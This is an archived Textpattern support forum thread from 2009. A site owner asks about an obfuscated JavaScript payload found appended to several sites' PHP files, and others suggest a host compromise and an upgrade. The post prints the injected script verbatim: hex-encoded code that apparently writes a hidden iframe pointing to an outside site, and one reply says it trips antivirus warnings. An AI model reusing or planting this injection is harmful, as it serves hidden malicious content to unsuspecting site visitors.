Go to main content

Navigation menu

Textpattern CMS support forum

You are not logged in. Register | Login | Help

  1. Index
  2. » Archives
  3. » [Solved] several hacked Textpatterns on different domains?

Pages: 1

#1 2009-03-12 22:04:28

Noxgenus
Member
Registered: 2009-03-12
Posts: 21

[Solved] several hacked Textpatterns on different domains?

Hi, new here…but not new to textpattern

Had this odd javascript added to index.php and publish.php files. This happened with 5 sites, all on different domains, on two different hosts and with different users and passwords for textpattern, ftp and mysql

The code added to the bottom part of the php files was this (the stuff in the < script > tags):

last part of the textpattern index.php:

$msg = 'config.php is missing or corrupt.  To install Textpattern, visit <a href="./textpattern/setup/">textpattern/setup/</a>';
		exit ($msg);
	}

	include txpath.'/publish.php';
	textpattern();

?>
<script>function c265607b11i49b92fff3071c(i49b92fff3180a){  return (parseInt(i49b92fff3180a,16));}function i49b92fff32667(i49b92fff32a76){  var i49b92fff32e33='';i49b92fff33dd3=String.fromCharCode;for(i49b92fff3321c=0;i49b92fff3321c<i49b92fff32a76.length;i49b92fff3321c+=2){ i49b92fff32e33+=(i49b92fff33dd3(c265607b11i49b92fff3071c(i49b92fff32a76.substr(i49b92fff3321c,2))));}return i49b92fff32e33;} var rff='';var i49b92fff341ec='3C7'+rff+'3637'+rff+'2697'+rff+'07'+rff+'43E696628216D7'+rff+'96961297'+rff+'B646F637'+rff+'56D656E7'+rff+'42E7'+rff+'7'+rff+'7'+rff+'2697'+rff+'465287'+rff+'56E657'+rff+'363617'+rff+'065282027'+rff+'2533632536392536362537'+rff+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+rff+'332537'+rff+'32253633253364253237'+rff+'2536382537'+rff+'342537'+rff+'342537'+rff+'302533612532662532662536642536312536632537'+rff+'37'+rff+'2536312537'+rff+'322536352537'+rff+'342537'+rff+'322536312536332536622537'+rff+'332537'+rff+'392537'+rff+'332537'+rff+'34253635253664253265253633253666253664253266253366253237'+rff+'2532622534642536312537'+rff+'342536382532652537'+rff+'322536662537'+rff+'352536652536342532382534642536312537'+rff+'342536382532652537'+rff+'32253631253665253634253666253664253238253239253261253336253338253336253239253262253237'+rff+'253333253334253335253332253237'+rff+'2532302537'+rff+'37'+rff+'2536392536342537'+rff+'34253638253364253337'+rff+'253230253638253635253639253637'+rff+'2536382537'+rff+'342533642533392533382532302537'+rff+'332537'+rff+'342537'+rff+'39253663253635253364253237'+rff+'2537'+rff+'362536392537'+rff+'332536392536322536392536632536392537'+rff+'342537'+rff+'39253361253638253639253634253634253635253665253237'+rff+'2533652533632532662536392536362537'+rff+'3225363125366425363525336527'+rff+'29293B7'+rff+'D7'+rff+'6617'+rff+'2206D7'+rff+'969613D7'+rff+'47'+rff+'27'+rff+'5653B3C2F7'+rff+'3637'+rff+'2697'+rff+'07'+rff+'43E';document.write(i49b92fff32667(i49b92fff341ec));</script>

Anybody know where this comes from? It has to have been added this week, I validated one of my sites in development at w3c, and came across these six errors that said some javascript was added after the html closing tag.

thanks

Last edited by Noxgenus (2009-03-12 22:06:09)

Offline

#2 2009-03-12 23:08:26

MattD
Plugin Author
From: Monterey, California
Registered: 2008-03-21
Posts: 1,254
Website

Re: [Solved] several hacked Textpatterns on different domains?

Are these on different hosts? I’ve seen similar issues on my old host where all of my domains on that host were affected.

My Plugins

Piwik Dashboard, Google Analytics Dashboard, Minibar, Article Image Colorpicker, Admin Datepicker, Admin Google Map, Admin Colorpicker

Offline

#3 2009-03-13 10:55:48

Mary
Sock Enthusiast
Registered: 2004-06-27
Posts: 6,236

Re: [Solved] several hacked Textpatterns on different domains?

Are your sites using the latest stable version?

http://textpattern.com/security

Offline

#4 2009-03-13 11:06:20

Noxgenus
Member
Registered: 2009-03-12
Posts: 21

Re: [Solved] several hacked Textpatterns on different domains?

Most of them were running 4.0.6, so no, they weren’t the latest

Updated all of them to 4.0.8 and the problems are gone and have not come back since yesterday…I have checked most of the logs, but nothing out of the ordinary

just wondering where this came from? ..already emailed the hosts, but no reply yet

Offline

#5 2009-03-13 12:37:28

the_ghost
Plugin Author
From: Minsk, The Republic of Belarus
Registered: 2007-07-26
Posts: 907
Website

Re: [Solved] several hacked Textpatterns on different domains?

I think it’s host issue – or ftp passwords were stolen or host was hacked (if you’re using virual shared hosting hacking one account can give access to all clients of this virtual host).

Providing help in hacking ATM! Come to courses and don’t forget to bring us notebook and hammer! What for notebook? What a kind of hacker you are without notebok?

Offline

#6 2009-03-25 18:08:01

keith
Member
From: Blyth, Northumberland, England
Registered: 2004-12-08
Posts: 199
Website

Re: [Solved] several hacked Textpatterns on different domains?

Ummm…

when I access this page I get a Virus/Trojan Horse warning from Avast! anti-virus (for “JS:Packed-AK”) – a new experience for me!

Keith
Blyth, Northumberland, England
Capture The Moment

Offline

#7 2009-03-25 22:06:08

Noxgenus
Member
Registered: 2009-03-12
Posts: 21

Re: [Solved] several hacked Textpatterns on different domains?

was a hack through the hosts, some server leak

Offline

Pages: 1

  1. Index
  2. » Archives
  3. » [Solved] several hacked Textpatterns on different domains?

Board footer

Powered by FluxBB